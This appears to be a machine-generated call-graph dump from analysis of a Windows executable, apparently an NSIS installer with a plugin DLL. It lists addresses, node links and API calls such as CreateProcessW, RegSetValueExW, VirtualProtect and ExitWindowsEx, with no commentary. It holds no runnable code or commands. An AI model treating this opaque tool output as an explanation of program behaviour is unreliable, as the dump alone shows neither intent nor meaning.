4132->4111 4133->4117 4135 405e2e 4134->4135 4135->4119 4136 405cf2 lstrlenA 4135->4136 4137 405d33 lstrlenA 4136->4137 4138 405d3b 4137->4138 4139 405d0c lstrcmpiA 4137->4139 4138->4125 4138->4126 4139->4138 4140 405d2a CharNextA 4139->4140 4140->4137 4142 405e5d GlobalFree 4141->4142 4142->4119 4143 4015c1 4144 402c41 17 API calls 4143->4144 4145 4015c8 4144->4145 4146 405c17 4 API calls 4145->4146 4159 4015d1 4146->4159 4147 401631 4149 401663 4147->4149 4150 401636 4147->4150 4148 405b99 CharNextW 4148->4159 4152 401423 24 API calls 4149->4152 4170 401423 4150->4170 4156 40165b 4152->4156 4158 40164a SetCurrentDirectoryW 4158->4156 4159->4147 4159->4148 4160 401617 GetFileAttributesW 4159->4160 4162 405868 4159->4162 4165 4057ce CreateDirectoryW 4159->4165 4174 40584b CreateDirectoryW 4159->4174 4160->4159 4177 406671 GetModuleHandleA 4162->4177 4166 40581b 4165->4166 4167 40581f GetLastError 4165->4167 4166->4159 4167->4166 4168 40582e SetFileSecurityW 4167->4168 4168->4166 4169 405844 GetLastError 4168->4169 4169->4166 4171 4052ff 24 API calls 4170->4171 4172 401431 4171->4172 4173 406297 lstrcpynW 4172->4173 4173->4158 4175 40585b 4174->4175 4176 40585f GetLastError 4174->4176 4175->4159 4176->4175 4178 406697 GetProcAddress 4177->4178 4179 40668d 4177->4179 4181 40586f 4178->4181 4183 406601 GetSystemDirectoryW 4179->4183 4181->4159 4182 406693 4182->4178 4182->4181 4184 406623 wsprintfW LoadLibraryExW 4183->4184 4184->4182 5016 404344 lstrcpynW lstrlenW 5017 403945 5018 403950 5017->5018 5019 403954 5018->5019 5020 403957 GlobalAlloc 5018->5020 5020->5019 4259 401e49 4260 402c1f 17 API calls 4259->4260 4261 401e4f 4260->4261 4262 402c1f 17 API calls 4261->4262 4263 401e5b 4262->4263 4264 401e72 EnableWindow 4263->4264 4265 401e67 ShowWindow 4263->4265 4266 402ac5 4264->4266 4265->4266 5021 40264a 5022 402c1f 17 API calls 5021->5022 5023 402659 5022->5023 5024 4026a3 ReadFile 5023->5024 5025 405e10 ReadFile 5023->5025 5026 4026e3 MultiByteToWideChar 5023->5026 5027 402798 5023->5027 5030 402709 SetFilePointer MultiByteToWideChar 5023->5030 5031 4027a9 5023->5031 5033 402796 5023->5033 5034 405e6e SetFilePointer 5023->5034 5024->5023 5024->5033 5025->5023 5026->5023 5043 4061de wsprintfW 5027->5043 5030->5023 5032 4027ca SetFilePointer 5031->5032 5031->5033 5032->5033 5035 405e8a 5034->5035 5042 405ea2 5034->5042 5036 405e10 ReadFile 5035->5036 5037 405e96 5036->5037 5038 405ed3 SetFilePointer 5037->5038 5039 405eab SetFilePointer 5037->5039 5037->5042 5038->5042 5039->5038 5040 405eb6 5039->5040 5041 405e3f WriteFile 5040->5041 5041->5042 5042->5023 5043->5033 5047 4016cc 5048 402c41 17 API calls 5047->5048 5049 4016d2 GetFullPathNameW 5048->5049 5050 4016ec 5049->5050 5056 40170e 5049->5056 5053 4065da 2 API calls 5050->5053 5050->5056 5051 401723 GetShortPathNameW 5052 402ac5 5051->5052 5054 4016fe 5053->5054 5054->5056 5057 406297 lstrcpynW 5054->5057 5056->5051 5056->5052 5057->5056 5058 4043cd 5060 4044ff 5058->5060 5061 4043e5 5058->5061 5059 404569 5062 404633 5059->5062 5063 404573 GetDlgItem 5059->5063 5060->5059 5060->5062 5069 40453a GetDlgItem SendMessageW 5060->5069 5064 40420e 18 API calls 5061->5064 5068 404275 8 API calls 5062->5068 5065 4045f4 5063->5065 5066 40458d 5063->5066 5067 40444c 5064->5067 5065->5062 5072 404606 5065->5072 5066->5065 5071 4045b3 SendMessageW LoadCursorW SetCursor 5066->5071 5070 40420e 18 API calls 5067->5070 5083 40462e 5068->5083 5091 404230 EnableWindow 5069->5091 5075 404459 CheckDlgButton 5070->5075 5095 40467c 5071->5095 5077 40461c 5072->5077 5078 40460c SendMessageW 5072->5078 5074 404564 5092 404658 5074->5092 5089 404230 EnableWindow 5075->5089 5082 404622 SendMessageW 5077->5082 5077->5083 5078->5077 5082->5083 5084 404477 GetDlgItem 5090 404243 SendMessageW 5084->5090 5086 40448d SendMessageW 5087 4044b3 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5086->5087 5088 4044aa GetSysColor 5086->5088 5087->5083 5088->5087 5089->5084 5090->5086 5091->5074 5093 404666 5092->5093 5094 40466b SendMessageW 5092->5094 5093->5094 5094->5059 5098 4058c3 ShellExecuteExW 5095->5098 5097 4045e2 LoadCursorW SetCursor 5097->5065 5098->5097 5099 40234e 5100 402c41 17 API calls 5099->5100 5101 40235d 5100->5101 5102 402c41 17 API calls 5101->5102 5103 402366 5102->5103 5104 402c41 17 API calls 5103->5104 5105 402370 GetPrivateProfileStringW 5104->5105 5106 401b53 5107 402c41 17 API calls 5106->5107 5108 401b5a 5107->5108 5109 402c1f 17 API calls 5108->5109 5110 401b63 wsprintfW 5109->5110 5111 402ac5 5110->5111 5112 404a55 5113 404a81 5112->5113 5114 404a65 5112->5114 5115 404ab4 5113->5115 5116 404a87 SHGetPathFromIDListW 5113->5116 5123 4058e1 GetDlgItemTextW 5114->5123 5118 404a9e SendMessageW 5116->5118 5119 404a97 5116->5119 5118->5115 5121 40140b 2 API calls 5119->5121 5120 404a72 SendMessageW 5120->5113 5121->5118 5123->5120 5124 401956 5125 402c41 17 API calls 5124->5125 5126 40195d lstrlenW 5125->5126 5127 402592 5126->5127 4889 4014d7 4890 402c1f 17 API calls 4889->4890 4891 4014dd Sleep 4890->4891 4893 402ac5 4891->4893 5128 401f58 5129 402c41 17 API calls 5128->5129 5130 401f5f 5129->5130 5131 4065da 2 API calls 5130->5131 5132 401f65 5131->5132 5134 401f76 5132->5134 5135 4061de wsprintfW 5132->5135 5135->5134 5136 402259 5137 402c41 17 API calls 5136->5137 5138 40225f 5137->5138 5139 402c41 17 API calls 5138->5139 5140 402268 5139->5140 5141 402c41 17 API calls 5140->5141 5142 402271 5141->5142 5143 4065da 2 API calls 5142->5143 5144 40227a 5143->5144 5145 40228b lstrlenW lstrlenW 5144->5145 5146 40227e 5144->5146 5148 4052ff 24 API calls 5145->5148 5147 4052ff 24 API calls 5146->5147 5149 402286 5147->5149 5150 4022c9 SHFileOperationW 5148->5150 5150->5146 5150->5149 4996 40175c 4997 402c41 17 API calls 4996->4997 4998 401763 4997->4998 4999 405dbc 2 API calls 4998->4999 5000 40176a 4999->5000 5001 405dbc 2 API calls 5000->5001 5001->5000 5151 4022dd 5152 4022f7 5151->5152 5153 4022e4 5151->5153 5154 4062b9 17 API calls 5153->5154 5155 4022f1 5154->5155 5156 4058fd MessageBoxIndirectW 5155->5156 5156->5152 5157 401d5d GetDlgItem GetClientRect 5158 402c41 17 API calls 5157->5158 5159 401d8f LoadImageW SendMessageW 5158->5159 5160 401dad DeleteObject 5159->5160 5161 402ac5 5159->5161 5160->5161 5162 401563 5163 402a6b 5162->5163 5166 4061de wsprintfW 5163->5166 5165 402a70 5166->5165 4190 4023e4 4191 402c41 17 API calls 4190->4191 4192 4023f6 4191->4192 4193 402c41 17 API calls 4192->4193 4194 402400 4193->4194 4207 402cd1 4194->4207 4197 40288b 4198 402438 4200 402444 4198->4200 4211 402c1f 4198->4211 4199 402c41 17 API calls 4202 40242e lstrlenW 4199->4202 4201 402463 RegSetValueExW 4200->4201 4214 403116 4200->4214 4205 402479 RegCloseKey 4201->4205 4202->4198 4205->4197 4208 402cec 4207->4208 4234 406132 4208->4234 4212 4062b9 17 API calls 4211->4212 4213 402c34 4212->4213 4213->4200 4215 40312f 4214->4215 4216 40315d 4215->4216 4241 403324 SetFilePointer 4215->4241 4238 40330e 4216->4238 4220 4032a7 4222 4032e9 4220->4222 4227 4032ab 4220->4227 4221 40317a GetTickCount 4223 403291 4221->4223 4230 4031a6 4221->4230 4224 40330e ReadFile 4222->4224 4223->4201 4224->4223 4225 40330e ReadFile 4225->4230 4226 40330e ReadFile 4226->4227 4227->4223 4227->4226 4228 405e3f WriteFile 4227->4228 4228->4227 4229 4031fc GetTickCount 4229->4230 4230->4223 4230->4225 4230->4229 4231 403221 MulDiv wsprintfW 4230->4231 4233 405e3f WriteFile 4230->4233 4232 4052ff 24 API calls 4231->4232 4232->4230 4233->4230 4235 406141 4234->4235 4236 40614c RegCreateKeyExW 4235->4236 4237 402410 4235->4237 4236->4237 4237->4197 4237->4198 4237->4199 4239 405e10 ReadFile 4238->4239 4240 403168 4239->4240 4240->4220 4240->4221 4240->4223 4241->4216 5167 402868 5168 402c41 17 API calls 5167->5168 5169 40286f FindFirstFileW 5168->5169 5170 402897 5169->5170 5174 402882 5169->5174 5175 4061de wsprintfW 5170->5175 5172 4028a0 5176 406297 lstrcpynW 5172->5176 5175->5172 5176->5174 5177 401968 5178 402c1f 17 API calls 5177->5178 5179 40196f 5178->5179 5180 402c1f 17 API calls 5179->5180 5181 40197c 5180->5181 5182 402c41 17 API calls 5181->5182 5183 401993 lstrlenW 5182->5183 5184 4019a4 5183->5184 5187 4019e5 5184->5187 5189 406297 lstrcpynW 5184->5189 5186 4019d5 5186->5187 5188 4019da lstrlenW 5186->5188 5188->5187 5189->5186 4267 703d2997 4268 703d29e7 4267->4268 4269 703d29a7 VirtualProtect 4267->4269 4269->4268 5190 40166a 5191 402c41 17 API calls 5190->5191 5192 401670 5191->5192 5193 4065da 2 API calls 5192->5193 5194 401676 5193->5194 4270 40336c SetErrorMode GetVersion 4271 4033ab 4270->4271 4272 4033b1 4270->4272 4273 406671 5 API calls 4271->4273 4274 406601 3 API calls 4272->4274 4273->4272 4275 4033c7 lstrlenA 4274->4275 4275->4272 4276 4033d7 4275->4276 4277 406671 5 API calls 4276->4277 4278 4033de 4277->4278 4279 406671 5 API calls 4278->4279 4280 4033e5 4279->4280 4281 406671 5 API calls 4280->4281 4282 4033f1 #17 OleInitialize SHGetFileInfoW 4281->4282 4360 406297 lstrcpynW 4282->4360 4285 40343d GetCommandLineW 4361 406297 lstrcpynW 4285->4361 4287 40344f 4288 405b99 CharNextW 4287->4288 4289 403474 CharNextW 4288->4289 4290 40359e GetTempPathW 4289->4290 4301 40348d 4289->4301 4362 40333b 4290->4362 4292 4035b6 4293 403610 DeleteFileW 4292->4293 4294 4035ba GetWindowsDirectoryW lstrcatW 4292->4294 4372 402edd GetTickCount GetModuleFileNameW 4293->4372 4295 40333b 12 API calls 4294->4295 4298 4035d6 4295->4298 4296 405b99 CharNextW 4296->4301 4298->4293 4300 4035da GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4298->4300 4299 403624 4309 405b99 CharNextW 4299->4309 4342 4036c7 4299->4342 4355 4036d7 4299->4355 4302 40333b 12 API calls 4300->4302 4301->4296 4303 403589 4301->4303 4304 403587 4301->4304 4307 403608 4302->4307 4456 406297 lstrcpynW 4303->4456 4304->4290 4307->4293 4307->4355 4325 403643 4309->4325 4311 403811 4314 403895 ExitProcess 4311->4314 4315 403819 GetCurrentProcess OpenProcessToken 4311->4315 4312 4036f1 4466 4058fd 4312->4466 4320 403831 LookupPrivilegeValueW AdjustTokenPrivileges 4315->4320 4321 403865 4315->4321 4318 4036a1 4322 405c74 18 API calls 4318->4322 4319 403707 4323 405868 5 API calls 4319->4323 4320->4321 4324 406671 5 API calls 4321->4324 4326 4036ad 4322->4326 4327 40370c lstrcatW 4323->4327 4328 40386c 4324->4328 4325->4318 4325->4319 4326->4355 4457 406297 lstrcpynW 4326->4457 4329 403728 lstrcatW lstrcmpiW 4327->4329 4330 40371d lstrcatW 4327->4330 4331 403881 ExitWindowsEx 4328->4331 4334 40388e 4328->4334 4333 403744 4329->4333 4329->4355 4330->4329 4331->4314 4331->4334 4337 403750 4333->4337 4338 403749 4333->4338 4475 40140b 4334->4475 4336 4036bc 4458 406297 lstrcpynW 4336->4458 4341 40584b 2 API calls 4337->4341 4340 4057ce 4 API calls 4338->4340 4343 40374e 4340->4343 4344 403755 SetCurrentDirectoryW 4341->4344 4400 403987 4342->4400 4343->4344 4345 403770 4344->4345 4346 403765 4344->4346 4471 406297 lstrcpynW 4345->4471 4470 406297 lstrcpynW 4346->4470 4349 4062b9 17 API calls 4350 4037af DeleteFileW 4349->4350 4351 4037bc CopyFileW 4350->4351 4357 40377e 4350->4357 4351->4357 4352 403805 4353 40605d 36 API calls 4352->4353 4353->4355 4354 40605d 36 API calls 4354->4357 4459 4038ad 4355->4459 4356 4062b9 17 API calls 4356->4357 4357->4349 4357->4352 4357->4354 4357->4356 4359 4037f0 CloseHandle 4357->4359 4472 405880 CreateProcessW 4357->4472 4359->4357 4360->4285 4361->4287 4363 40652b 5 API calls 4362->4363 4365 403347 4363->4365 4364 403351 4364->4292 4365->4364 4366 405b6c 3 API calls 4365->4366 4367 403359 4366->4367 4368 40584b 2 API calls 4367->4368 4369 40335f 4368->4369 4478 405dbc 4369->4478 4482 405d8d GetFileAttributesW CreateFileW 4372->4482 4374 402f1d 4392 402f2d 4374->4392 4483 406297 lstrcpynW 4374->4483 4376 402f43 4377 405bb8 2 API calls 4376->4377 4378 402f49 4377->4378 4484 406297 lstrcpynW 4378->4484 4380 402f54 GetFileSize 4381 402f6b 4380->4381 4397 403050 4380->4397 4384 40330e ReadFile 4381->4384 4387 4030bc 4381->4387 4381->4392 4395 402e79 6 API calls 4381->4395 4381->4397 4383 403059 4385 403089 GlobalAlloc 4383->4385 4383->4392 4497 403324 SetFilePointer 4383->4497 4384->4381 4496 403324 SetFilePointer 4385->4496 4389 402e79 6 API calls 4387->4389 4389->4392 4390 403072 4393 40330e ReadFile 4390->4393 4391 4030a4 4394 403116 31 API calls 4391->4394 4392->4299 4396 40307d 4393->4396 4398 4030b0 4394->4398 4395->4381 4396->4385 4396->4392 4485 402e79 4397->4485 4398->4392 4398->4398 4399 4030ed SetFilePointer 4398->4399 4399->4392 4401 406671 5 API calls 4400->4401 4402 40399b 4401->4402 4403 4039a1 GetUserDefaultUILanguage 4402->4403 4404 4039b3 4402->4404 4502 4061de wsprintfW 4403->4502 4406 406165 3 API calls 4404->4406 4408 4039e3 4406->4408 4407 4039b1 4503 403c5d 4407->4503 4409 403a02 lstrcatW 4408->4409 4410 406165 3 API calls 4408->4410 4409->4407 4410->4409 4413 405c74 18 API calls 4414 403a34 4413->4414 4415 403ac8 4414->4415 4417 406165 3 API calls 4414->4417 4416 405c74 18 API calls 4415->4416 4418 403ace 4416->4418 4420 403a66 4417->4420 4419 403ade LoadImageW 4418->4419 4421 4062b9 17 API calls 4418->4421 4422 403b84 4419->4422 4423 403b05 RegisterClassW 4419->4423 4420->4415 4426 403a87 lstrlenW 4420->4426 4430 405b99 CharNextW 4420->4430 4421->4419 4425 40140b 2 API calls 4422->4425 4424 403b3b SystemParametersInfoW CreateWindowExW 4423->4424 4455 403b8e 4423->4455 4424->4422 4429 403b8a 4425->4429 4427 403a95 lstrcmpiW 4426->4427 4428 403abb 4426->4428 4427->4428 4431 403aa5 GetFileAttributesW 4427->4431 4432 405b6c 3 API calls 4428->4432 4435 403c5d 18 API calls 4429->4435 4429->4455 4433 403a84 4430->4433 4434 403ab1 4431->4434 4436 403ac1 4432->4436 4433->4426 4434->4428 4437 405bb8 2 API calls 4434->4437 4438 403b9b 4435->4438 4511 406297 lstrcpynW 4436->4511 4437->4428 4440 403ba7 ShowWindow 4438->4440 4441 403c2a 4438->4441 4443 406601 3 API calls 4440->4443 4512 4053d2 OleInitialize 4441->4512 4445 403bbf 4443->4445 4444 403c30 4446 403c34 4444->4446 4447 403c4c 4444->4447 4448 403bcd GetClassInfoW 4445->4448 4450 406601 3 API calls 4445->4450 4454 40140b 2 API calls 4446->4454 4446->4455 4449 40140b 2 API calls 4447->4449 4451 403be1 GetClassInfoW RegisterClassW 4448->4451 4452 403bf7 DialogBoxParamW 4448->4452 4449->4455 4450->4448 4451->4452 4453 40140b 2 API calls 4452->4453 4453->4455 4454->4455 4455->4355 4456->4304 4457->4336 4458->4342 4460 4038c5 4459->4460 4461 4038b7 CloseHandle 4459->4461 4530 4038f2 4460->4530 4461->4460 4464 4059a9 67 API calls 4465 4036e0 OleUninitialize 4464->4465 4465->4311 4465->4312 4467 405912 4466->4467 4468 4036ff ExitProcess 4467->4468 4469 405926 MessageBoxIndirectW 4467->4469 4469->4468 4470->4345 4471->4357 4473 4058b3 CloseHandle 4472->4473 4474 4058bf 4472->4474 4473->4474 4474->4357 4476 401389 2 API calls 4475->4476 4477 401420 4476->4477 4477->4314 4479 405dc9 GetTickCount GetTempFileNameW 4478->4479 4480 40336a 4479->4480 4481 405dff 4479->4481 4480->4292 4481->4479 4481->4480 4482->4374 4483->4376 4484->4380 4486 402e82 4485->4486 4487 402e9a 4485->4487 4490 402e92 4486->4490 4491 402e8b DestroyWindow 4486->4491 4488 402ea2 4487->4488 4489 402eaa GetTickCount 4487->4489 4498 4066ad 4488->4498 4493 402eb8 CreateDialogParamW ShowWindow 4489->4493 4494 402edb 4489->4494 4490->4383 4491->4490 4493->4494 4494->4383 4496->4391 4497->4390 4499 4066ca PeekMessageW 4498->4499 4500 4066c0 DispatchMessageW 4499->4500 4501 402ea8 4499->4501 4500->4499 4501->4383 4502->4407 4504 403c71 4503->4504 4519 4061de wsprintfW 4504->4519 4506 403ce2 4520 403d16 4506->4520 4508 403a12 4508->4413 4509 403ce7 4509->4508 4510 4062b9 17 API calls 4509->4510 4510->4509 4511->4415 4523 40425a 4512->4523 4514 4053f5 4518 40541c 4514->4518 4526 401389 4514->4526 4515 40425a SendMessageW 4516 40542e OleUninitialize 4515->4516 4516->4444 4518->4515 4519->4506 4521 4062b9 17 API calls 4520->4521 4522 403d24 SetWindowTextW 4521->4522 4522->4509 4524 404272 4523->4524 4525 404263 SendMessageW 4523->4525 4524->4514 4525->4524 4528 401390 4526->4528 4527 4013fe 4527->4514 4528->4527 4529 4013cb MulDiv SendMessageW 4528->4529 4529->4528 4531 403900 4530->4531 4532 4038ca 4531->4532 4533 403905 FreeLibrary GlobalFree 4531->4533 4532->4464 4533->4532 4533->4533 4534 40176f 4535 402c41 17 API calls 4534->4535 4536 401776 4535->4536 4537 401796 4536->4537 4538 40179e 4536->4538 4573 406297 lstrcpynW 4537->4573 4574 406297 lstrcpynW 4538->4574 4541 4017a9 4543 405b6c 3 API calls 4541->4543 4542 40179c 4545 40652b 5 API calls 4542->4545 4544 4017af lstrcatW 4543->4544 4544->4542 4554 4017bb 4545->4554 4546 4065da 2 API calls 4546->4554 4547 405d68 2 API calls 4547->4554 4549 4017cd CompareFileTime 4549->4554 4550 40188d 4551 4052ff 24 API calls 4550->4551 4553 401897 4551->4553 4552 4052ff 24 API calls 4562 401879 4552->4562 4555 403116 31 API calls 4553->4555 4554->4546 4554->4547 4554->4549 4554->4550 4556 406297 lstrcpynW 4554->4556 4559 4062b9 17 API calls 4554->4559 4569 4058fd MessageBoxIndirectW 4554->4569 4570 401864 4554->4570 4572 405d8d GetFileAttributesW CreateFileW 4554->4572 4557 4018aa 4555->4557 4556->4554 4558 4018be SetFileTime 4557->4558 4560 4018d0 CloseHandle 4557->4560 4558->4560 4559->4554 4561 4018e1 4560->4561 4560->4562 4563 4018e6 4561->4563 4564 4018f9 4561->4564 4566 4062b9 17 API calls 4563->4566 4565 4062b9 17 API calls 4564->4565 4568 401901 4565->4568 4567 4018ee lstrcatW 4566->4567 4567->4568 4571 4058fd MessageBoxIndirectW 4568->4571 4569->4554 4570->4552 4570->4562 4571->4562 4572->4554 4573->4542 4574->4541 5195 4027ef 5196 4027f6 5195->5196 5202 402a70 5195->5202 5197 402c1f 17 API calls 5196->5197 5198 4027fd 5197->5198 5199 40280c SetFilePointer 5198->5199 5200 40281c 5199->5200 5199->5202 5203 4061de wsprintfW 5200->5203 5203->5202 5204 401a72 5205 402c1f 17 API calls 5204->5205 5206 401a7b 5205->5206 5207 402c1f 17 API calls 5206->5207 5208 401a20 5207->5208 4763 405273 4764 405283 4763->4764 4765 405297 4763->4765 4767 405289 4764->4767 4776 4052e0 4764->4776 4766 40529f IsWindowVisible 4765->4766 4770 4052bf 4765->4770 4769 4052ac 4766->4769 4766->4776 4768 40425a SendMessageW 4767->4768 4772 405293 4768->4772 4777 404bc9 SendMessageW 4769->4777 4771 4052e5 CallWindowProcW 4770->4771 4782 404c49 4770->4782 4771->4772 4776->4771 4778 404c28 SendMessageW 4777->4778 4779 404bec GetMessagePos ScreenToClient SendMessageW 4777->4779 4780 404c20 4778->4780 4779->4780 4781 404c25 4779->4781 4780->4770 4781->4778 4791 406297 lstrcpynW 4782->4791 4784 404c5c 4792 4061de wsprintfW 4784->4792 4786 404c66 4787 40140b 2 API calls 4786->4787 4788 404c6f 4787->4788 4793 406297 lstrcpynW 4788->4793 4790 404c76 4790->4776 4791->4784 4792->4786 4793->4790 5209 401cf3 5210 402c1f 17 API calls 5209->5210 5211 401cf9 IsWindow 5210->5211 5212 401a20 5211->5212 5213 401573 5214 401583 ShowWindow 5213->5214 5215 40158c 5213->5215 5214->5215 5216 402ac5 5215->5216 5217 40159a ShowWindow 5215->5217 5217->5216 5218 402df3 5219 402e05 SetTimer 5218->5219 5221 402e1e 5218->5221 5219->5221 5220 402e73 5221->5220 5222 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5221->5222 5222->5220 5223 4014f5 SetForegroundWindow 5224 402ac5 5223->5224 5225 402576 5226 402c41 17 API calls 5225->5226 5227 40257d 5226->5227 5230 405d8d GetFileAttributesW CreateFileW 5227->5230 5229 402589 5230->5229 4894 401b77 4895 401b84 4894->4895 4896 401bc8 4894->4896 4899 401c0d 4895->4899 4903 401b9b 4895->4903 4897 401bf2 GlobalAlloc 4896->4897 4898 401bcd 4896->4898 4900 4062b9 17 API calls 4897->4900 4907 4022f7 4898->4907 4915 406297 lstrcpynW 4898->4915 4901 4062b9 17 API calls 4899->4901 4899->4907 4900->4899 4904 4022f1 4901->4904 4913 406297 lstrcpynW 4903->4913 4909 4058fd MessageBoxIndirectW 4904->4909 4905 401bdf GlobalFree 4905->4907 4908 401baa 4914 406297 lstrcpynW 4908->4914 4909->4907 4911 401bb9 4916 406297 lstrcpynW 4911->4916 4913->4908 4914->4911 4915->4905 4916->4907 4917 4024f8 4918 402c81 17 API calls 4917->4918 4919 402502 4918->4919 4920 402c1f 17 API calls 4919->4920 4921 40250b 4920->4921 4922 402533 RegEnumValueW 4921->4922 4923 402527 RegEnumKeyW 4921->4923 4926 40288b 4921->4926 4924 40254f RegCloseKey 4922->4924 4925 402548 4922->4925 4923->4924 4924->4926 4925->4924 4928 404c7b GetDlgItem GetDlgItem 4929 404ccd 7 API calls 4928->4929 4938 404ee6 4928->4938 4930 404d70 DeleteObject 4929->4930 4931 404d63 SendMessageW 4929->4931 4932 404d79 4930->4932 4931->4930 4933 404db0 4932->4933 4937 4062b9 17 API calls 4932->4937 4935 40420e 18 API calls 4933->4935 4934 404fca 4936 405076 4934->4936 4942 40525e 4934->4942 4948 405023 SendMessageW 4934->4948 4941 404dc4 4935->4941 4943 405080 SendMessageW 4936->4943 4944 405088 4936->4944 4945 404d92 SendMessageW SendMessageW 4937->4945 4938->4934 4939 404fab 4938->4939 4940 404f46 4938->4940 4939->4934 4950 404fbc SendMessageW 4939->4950 4946 404bc9 5 API calls 4940->4946 4947 40420e 18 API calls 4941->4947 4949 404275 8 API calls 4942->4949 4943->4944 4951 4050a1 4944->4951 4952 40509a ImageList_Destroy 4944->4952 4960 4050b1 4944->4960 4945->4932 4964 404f57 4946->4964 4965 404dd2 4947->4965 4948->4942 4954 405038 SendMessageW 4948->4954 4955 40526c 4949->4955 4950->4934 4956 4050aa GlobalFree 4951->4956 4951->4960 4952->4951 4953 405220 4953->4942 4961 405232 ShowWindow GetDlgItem ShowWindow 4953->4961 4958 40504b 4954->4958 4956->4960 4957 404ea7 GetWindowLongW SetWindowLongW 4959 404ec0 4957->4959 4969 40505c SendMessageW 4958->4969 4962 404ec6 ShowWindow 4959->4962 4963 404ede 4959->4963 4960->4953 4974 404c49 4 API calls 4960->4974 4978 4050ec 4960->4978 4961->4942 4983 404243 SendMessageW 4962->4983 4984 404243 SendMessageW 4963->4984 4964->4939 4965->4957 4968 404e22 SendMessageW 4965->4968 4970 404ea1 4965->4970 4972 404e5e SendMessageW 4965->4972 4973 404e6f SendMessageW 4965->4973 4968->4965 4969->4936 4970->4957 4970->4959 4971 404ed9 4971->4942 4972->4965 4973->4965 4974->4978 4975 4051f6 InvalidateRect 4975->4953 4976 40520c 4975->4976 4985 404b84 4976->4985 4977 40511a SendMessageW 4979 405130 4977->4979 4978->4977 4978->4979 4979->4975 4980 405191 4979->4980 4982 4051a4 SendMessageW SendMessageW 4979->4982 4980->4982 4982->4979 4983->4971 4984->4938 4988 404abb 4985->4988 4987 404b99 4987->4953 4990 404ad4 4988->4990 4989 4062b9 17 API calls 4991 404b38 4989->4991 4990->4989 4992 4062b9 17 API calls 4991->4992 4993 404b43 4992->4993 4994 4062b9 17 API calls 4993->4994 4995 404b59 lstrlenW wsprintfW SetDlgItemTextW 4994->4995 4995->4987 5231 40167b 5232 402c41 17 API calls 5231->5232 5233 401682 5232->5233 5234 402c41 17 API calls 5233->5234 5235 40168b 5234->5235 5236 402c41 17 API calls 5235->5236 5237 401694 MoveFileW 5236->5237 5238 4016a0 5237->5238 5239 4016a7 5237->5239 5240 401423 24 API calls 5238->5240 5241 4065da 2 API calls 5239->5241 5243 402250 5239->5243 5240->5243 5242 4016b6 5241->5242 5242->5243 5244 40605d 36 API calls 5242->5244 5244->5238 5245 703d2301 5246 703d236b 5245->5246 5247 703d2395 5246->5247 5248 703d2376 GlobalAlloc 5246->5248 5248->5246 5249 401e7d 5250 402c41 17 API calls 5249->5250 5251 401e83 5250->5251 5252 402c41 17 API calls 5251->5252 5253 401e8c 5252->5253 5254 402c41 17 API calls 5253->5254 5255 401e95 5254->5255 5256 402c41 17 API calls 5255->5256 5257 401e9e 5256->5257 5258 401423 24 API calls 5257->5258 5259 401ea5 5258->5259 5266 4058c3 ShellExecuteExW 5259->5266 5261 401ee7 5264 40288b 5261->5264 5267 406722 WaitForSingleObject 5261->5267 5263 401f01 CloseHandle 5263->5264 5266->5261 5268 40673c 5267->5268 5269 40674e GetExitCodeProcess 5268->5269 5270 4066ad 2 API calls 5268->5270 5269->5263 5271 406743 WaitForSingleObject 5270->5271 5271->5268 5272 703d1000 5273 703d101b 5 API calls 5272->5273 5274 703d1019 5273->5274 5275 40437e lstrlenW 5276 40439d 5275->5276 5277 40439f WideCharToMultiByte 5275->5277 5276->5277 5278 4046ff 5279 40472b 5278->5279 5280 40473c 5278->5280 5339 4058e1 GetDlgItemTextW 5279->5339 5282 404748 GetDlgItem 5280->5282 5288 4047a7 5280->5288 5283 40475c 5282->5283 5287 404770 SetWindowTextW 5283->5287 5291 405c17 4 API calls 5283->5291 5284 40488b 5337 404a3a 5284->5337 5341 4058e1 GetDlgItemTextW 5284->5341 5285 404736 5286 40652b 5 API calls 5285->5286 5286->5280 5292 40420e 18 API calls 5287->5292 5288->5284 5293 4062b9 17 API calls 5288->5293 5288->5337 5290 404275 8 API calls 5295 404a4e 5290->5295 5296 404766 5291->5296 5297 40478c 5292->5297 5298 40481b SHBrowseForFolderW 5293->5298 5294 4048bb 5299 405c74 18 API calls 5294->5299 5296->5287 5303 405b6c 3 API calls 5296->5303 5300 40420e 18 API calls 5297->5300 5298->5284 5301 404833 CoTaskMemFree 5298->5301 5302 4048c1 5299->5302 5304 40479a 5300->5304 5305 405b6c 3 API calls 5301->5305 5342 406297 lstrcpynW 5302->5342 5303->5287 5340 404243 SendMessageW 5304->5340 5307 404840 5305->5307 5310 404877 SetDlgItemTextW 5307->5310 5314 4062b9 17 API calls 5307->5314 5309 4047a0 5312 406671 5 API calls 5309->5312 5310->5284 5311 4048d8 5313 406671 5 API calls 5311->5313 5312->5288 5320 4048df 5313->5320 5315 40485f lstrcmpiW 5314->5315 5315->5310 5317 404870 lstrcatW 5315->5317 5316 404920 5343 406297 lstrcpynW 5316->5343 5317->5310 5319 404927 5321 405c17 4 API calls 5319->5321 5320->5316 5325 405bb8 2 API calls 5320->5325 5326 404978 5320->5326 5322 40492d GetDiskFreeSpaceW 5321->5322 5324 404951 MulDiv 5322->5324 5322->5326 5324->5326 5325->5320 5327 4049e9 5326->5327 5329 404b84 20 API calls 5326->5329 5328 404a0c 5327->5328 5330 40140b 2 API calls 5327->5330 5344 404230 EnableWindow 5328->5344 5331 4049d6 5329->5331 5330->5328 5333 4049eb SetDlgItemTextW 5331->5333 5334 4049db 5331->5334 5333->5327 5335 404abb 20 API calls 5334->5335 5335->5327 5336 404a28 5336->5337 5338 404658 SendMessageW 5336->5338 5337->5290 5338->5337 5339->5285 5340->5309 5341->5294 5342->5311 5343->5319 5344->5336 5345 4019ff 5346 402c41 17 API calls 5345->5346 5347 401a06 5346->5347 5348 402c41 17 API calls 5347->5348 5349 401a0f 5348->5349 5350 401a16 lstrcmpiW 5349->5350 5351 401a28 lstrcmpW 5349->5351 5352 401a1c 5350->5352 5351->5352 5353 401000 5354 401037 BeginPaint GetClientRect 5353->5354 5355 40100c DefWindowProcW 5353->5355 5356 4010f3 5354->5356 5360 401179 5355->5360 5358 401073 CreateBrushIndirect FillRect DeleteObject 5356->5358 5359 4010fc 5356->5359 5358->5356 5361 401102 CreateFontIndirectW 5359->5361 5362 401167 EndPaint 5359->5362 5361->5362 5363 401112 6 API calls 5361->5363 5362->5360 5363->5362 5364 401503 5365 40150b 5364->5365 5367 40151e 5364->5367 5366 402c1f 17 API calls 5365->5366 5366->5367 4242 402484 4253 402c81 4242->4253 4245 402c41 17 API calls 4246 